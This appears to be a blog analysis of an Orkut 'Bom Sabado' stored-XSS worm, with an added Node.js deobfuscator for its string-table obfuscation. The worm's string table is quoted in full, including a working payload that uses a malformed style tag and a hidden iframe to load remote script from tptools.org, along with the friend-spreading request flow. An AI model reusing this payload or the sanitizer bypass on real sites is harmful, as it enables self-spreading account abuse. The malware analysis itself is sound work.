So, this morning I received an email saying I had received an Orkut scrap from a friend with the contents "Bom Sabado".
Within a minute, I received the same scrap from another friend. Now getting the feeling that this must be some sort of worm, I decided to open Orkut with Firebug logging enabled to see what was going on.
It turns out to be a typical case of stored Cross-Site Scripting (XSS): the attacker is able to include and execute his own script from hxxp://tptools.org/worm.js because the contents of the scrap bypass Orkut's sanitization and are rendered as HTML in the victim's scrapbook.
What it does
As soon as someone logs in and visits their scrapbook page,
- the same scrap is automatically posted to all of their friends;
- the script automatically joins a set of communities [in fact, it seems visiting one of these communities is sufficient to get infected] with community IDs 106698808, 6, 558494, 106698628, 106691341.
How to protect yourself
- Use Adblock (or any other request blocker) to block hxxp://tptools.org/worm.js. Keep in mind this only stops the current host; the loader assembles the URL from fragments at runtime, so a copy hosted elsewhere would need a new rule.
- Do not visit any of the aforementioned communities.
- Remember that merely opening your scrapbook page while an infected scrap sits in it is enough to trigger the worm, so be careful until the scraps are cleaned up.
How it works (spreads)
The script at the aforementioned URL is obfuscated; simplifying it shows that it is built around the following array of strings, which the rest of the code references by index (every endpoint, parameter name and payload the worm needs is in here):
var _0x37a1 = [
  "Microsoft.XMLHttp", "POST_TOKEN=", "CGI.POST_TOKEN", "&signature=", "Page.signature.raw",
  "POST", "Scrapbook?", "open", "Content-Type", "application/x-www-form-urlencoded;",
  "setRequestHeader", "&scrapText=",
  "<style/><iframe style=display:none onload=\"a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'##'; document . body . appendChild( a )\"></iframe>Bom Sabado!",
  "&uid=", "&Action.submit=1", "send", "GET", "RequestFriends?req=fl&uid=", "uid", "&oxh=1",
  "while (true); &&&START&&&", "", "replace", "responseText", "CommunityJoin?cmm=", "&Action.join=1",
  "106698808", "6", "558494", "106698628", "106691341",
  "var friends = ", ";", "list", "data", "id"
]
- It seems that an ill-formed <style/> tag is able to escape Google's sanitization mechanism, so that the rest of the scrap text is parsed as HTML [I might be wrong about this]. The hidden iframe's onload handler then assembles the script URL from concatenated fragments ('/' + '/tptools.o' + 'rg/worm.js'), presumably to dodge simple string filters, and appends it to the document.
- The string "while (true); &&&START&&&" is evidently a guard prefix on the RequestFriends response, the usual trick to stop JSON from being loaded cross-site as a script. It offers no protection here: the worm runs inside Orkut's own origin, reads responseText and simply strips the prefix (and the "var friends = " wrapper) with replace before walking the friend list (list, data, id) and posting the scrap to each uid with the page's own POST_TOKEN and signature.
- The five numeric strings near the end of the array (106698808, 6, 558494, 106698628, 106691341) are the community IDs to which the script automatically sends join requests via CommunityJoin?cmm=<id>&Action.join=1.
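As an added example (not part of the original post and not code from worm.js), here is a small Node.js deobfuscator for the string-table pattern worm.js uses: it substitutes every `_0x37a1[n]` reference with the string it names, folds adjacent literal concatenations such as `"&scrapText=" + "<style/>..."` into one literal, and turns `obj["prop"]` back into `obj.prop`. The table is the `_0x37a1` array quoted above; the SAMPLE snippet it is run on is constructed here in the same style for illustration and is not the worm's actual body, and `token`, `sig` and `fid` are placeholder variables standing in for values the real script reads from the page.

```javascript
// Added example: deobfuscating string-table ("_0xNNNN[n]") JavaScript.
// Not the worm's code. The table is the _0x37a1 array recovered from worm.js
// as quoted in the post; SAMPLE is a constructed snippet in the same style.
'use strict';

const _0x37a1 = [
  'Microsoft.XMLHttp', 'POST_TOKEN=', 'CGI.POST_TOKEN', '&signature=', 'Page.signature.raw',
  'POST', 'Scrapbook?', 'open', 'Content-Type', 'application/x-www-form-urlencoded;',
  'setRequestHeader', '&scrapText=',
  "<style/><iframe style=display:none onload=\"a = document.createElement( 'script');" +
    "a.src = '/' + '/tptools.o'+'rg/worm.js'+'##'; document . body . appendChild( a )\"></iframe>Bom Sabado!",
  '&uid=', '&Action.submit=1', 'send', 'GET', 'RequestFriends?req=fl&uid=', 'uid', '&oxh=1',
  'while (true); &&&START&&&', '', 'replace', 'responseText', 'CommunityJoin?cmm=', '&Action.join=1',
  '106698808', '6', '558494', '106698628', '106691341',
  'var friends = ', ';', 'list', 'data', 'id',
];

// Constructed sample (NOT the real worm body). token, sig and fid are
// placeholders for values the real script would read from the page.
const SAMPLE = `var req = new ActiveXObject(_0x37a1[0]);
req[_0x37a1[7]](_0x37a1[5], _0x37a1[6], false);
req[_0x37a1[10]](_0x37a1[8], _0x37a1[9]);
req[_0x37a1[15]](_0x37a1[1] + token + _0x37a1[3] + sig + _0x37a1[11] + _0x37a1[12] + _0x37a1[13] + fid + _0x37a1[14]);
var raw = req[_0x37a1[23]][_0x37a1[22]](_0x37a1[20], _0x37a1[21])[_0x37a1[22]](_0x37a1[31], _0x37a1[21]);`;

// Step 1: replace every `<tableName>[n]` with the string it names, as a
// JSON (double-quoted) literal. tableName is assumed to be a plain identifier.
function inlineTable(src, tableName, table) {
  const ref = new RegExp(`${tableName}\\[(\\d+)\\]`, 'g');
  return src.replace(ref, (_m, i) => {
    const idx = Number(i);
    if (idx >= table.length) throw new Error(`${tableName}[${idx}] is out of range`);
    return JSON.stringify(table[idx]);
  });
}

// Step 2: fold `"a" + "b"` into `"ab"`. The source is tokenized into
// double-quoted literals and non-literal runs first, so quotes escaped inside
// a literal (the onload="..." in the payload) are not taken as boundaries.
function foldConcats(src) {
  const tokens = src.match(/"(?:[^"\\]|\\.)*"|[^"]+/g) || [];
  const out = [];
  for (const tok of tokens) {
    const n = out.length;
    const isLit = tok[0] === '"';
    if (isLit && n >= 2 && /^\s*\+\s*$/.test(out[n - 1]) && out[n - 2][0] === '"') {
      // literal, "+", literal  ->  one merged literal
      out[n - 2] = JSON.stringify(JSON.parse(out[n - 2]) + JSON.parse(tok));
      out.pop();
    } else {
      out.push(tok);
    }
  }
  return out.join('');
}

// Step 3: obj["prop"] -> obj.prop when "prop" is a plain identifier.
function dotProperties(src) {
  return src.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

function deobfuscate(src, tableName, table) {
  return dotProperties(foldConcats(inlineTable(src, tableName, table)));
}

function deobfuscateSample() {
  return deobfuscate(SAMPLE, '_0x37a1', _0x37a1);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(deobfuscateSample());
}
```

Running it prints the sample with every table lookup resolved, e.g. `req.open("POST", "Scrapbook?", false);` and `req.responseText.replace("while (true); &&&START&&&", "").replace("var friends = ", "");`, which makes the request flow and the stripped guard prefix readable at a glance. The same three passes apply to any script using this obfuscator family; only the table name and contents change.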